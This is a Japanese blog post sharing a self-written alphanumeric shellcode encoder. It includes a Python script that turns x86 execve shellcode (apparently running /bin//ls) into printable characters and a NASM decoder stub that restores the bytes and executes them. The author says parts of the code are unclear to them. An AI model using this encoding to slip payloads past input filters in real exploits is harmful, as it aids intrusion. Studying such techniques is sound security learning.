自作alphanumeric shellcode encoder
昔シェルコードの勉強してるときに、文字列だけで構成するのが The Art of Hackingに書いてありまして。 冒頭部分しか書いてなかった(と思う)ので、勝手に自分で完成させたのですが 誰かの参考になれば幸いです。
たどたどしい説明と変なコードですが。
ちなみにディスアセンブルはここが便利です。
#!/usr/bin/python # understanding the alphanumeric shellcode concept ''' [i] going to split each hex in the shellcode in 2 part. For example, 0x31 is going to be 0011/0001 in bin. then, add 0x41 for converting to chars ['00110001', '11000000', '01010000', '01101000', '00101111', '00101111', '01101100', '01110011', '01101000', '00101111', '01100010', '01101001', '01101110', '10001001', '11100011', '01010000', '10001001', '11100010', '01010011', '10001001', '11100001', '10110000', '00001011', '11001101', '10000000'] [['0011', '0001'], ['1100', '0000'], ['0101', '0000'], ['0110', '1000'], ['0010', '1111'], ['0010', '1111'], ['0110', '1100'], ['0111', '0011'], ['0110', '1000'], ['0010', '1111'], ['0110', '0010'], ['0110', '1001'], ['0110', '1110'], ['1000', '1001'], ['1110', '0011'], ['0101', '0000'], ['1000', '1001'], ['1110', '0010'], ['0101', '0011'], ['1000', '1001'], ['1110', '0001'], ['1011', '0000'], ['0000', '1011'], ['1100', '1101'], ['1000', '0000']] printing obfuscated chars DBMAFAGICPCPGMHDGICPGCGJGOIJODFAIJOCFDIJOBLAALMNIA alpha shellcode 0x44,0x42,0x4d,0x41,0x46,0x41,0x47,0x49,0x43,0x50,0x43,0x50,0x47,0x4d,0x48,0x44,0x47,0x49,0x43,0x50,0x47,0x43,0x47,0x4a,0x47,0x4f,0x49,0x4a,0x4f,0x44,0x46,0x41,0x49,0x4a,0x4f,0x43,0x46,0x44,0x49,0x4a,0x4f,0x42,0x4c,0x41,0x41,0x4c,0x4d,0x4e,0x49,0x41, [Finished in 0.1s] ''' import re data="\x31\xc0\x50\x68\x2f\x2f\x6c\x73\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" buff = ['{:08b}'.format(i) for i in bytearray(data)] test = [(re.findall(".{4}",j)) for j in buff] print test final = [] for k,v in test: final.extend ([hex(int(k,2) + 0x41), hex(int(v,2) + 0x41)]) alphanumeric_encoded = "" obfuscated_chars ="" for shellcode in final: obfuscated_chars += chr(int(shellcode,16)) alphanumeric_encoded += shellcode+"," # .replace("0x", "\\x") print obfuscated_chars print alphanumeric_encoded
だいぶ前に書いたので、自分でも謎な部分があります。
; Filename: alpha.nasm ; ; Purpose: to understand alphanumeeric shellcode global _start section .text _start: jmp short call_decoder decoder: pop esi ; put the obfuscated shellcode to esi push esi ; save the starting point to the stack ; "DBMAFAGICPCPHDGIGICPGCGJGOIJODFAIJOCFDIJOBLAALMNIA" lea edi, [esi+1] ; put the shellcode to the edi. one char right ; "BMAFAGICPCPHDGIGICPGCGJGOIJODFAIJOCFDIJOBLAALMNIA" xor eax,eax xor ebx,ebx mov al,1 ; I think I tried to use this as a counter? decode: mov bl,byte [esi] ; move the first byte to ebcx sub bl, 41h ; deduce 41h (so back to the first 4 bit) shl bl, 4 ; slide 4 bit to the left add bl,byte [edi] ; add the next value to the ebx sub bl, 41h ; deduce 41h mov byte [esi],bl ; overwrite first byte (so D-41h --> 4 bit left --> add B-41h) decode_second: inc esi ; BMAFAGICPCPHDGIGICPGCGJGOIJODFAIJOCFDIJOBLAALMNIA inc edi inc edi ; AFAGICPCPHDGIGICPGCGJGOIJODFAIJOCFDIJOBLAALMNIA cmp byte [edi], 0x41 ; I tried to use sign flag (if the negative value, SF is on ) js final ; so this part should be skipped while reading the shellcode mov bl,byte [esi+eax] sub bl, 41h shl bl, 4 add bl,byte [edi] sub bl, 41h mov byte [esi],bl add al,1 jmp short decode_second final: pop esi call esi call_decoder: call decoder Shellcode: db 0x44,0x42,0x4d,0x41,0x46,0x41,0x47,0x49,0x43,0x50,0x43,0x50,0x47,0x4d,0x48,0x44,0x47,0x49,0x43,0x50,0x47,0x43,0x47,0x4a,0x47,0x4f,0x49,0x4a,0x4f,0x44,0x46,0x41,0x49,0x4a,0x4f,0x43,0x46,0x44,0x49,0x4a,0x4f,0x42,0x4c,0x41,0x41,0x4c,0x4d,0x4e,0x49,0x41,0x40,0x40 ```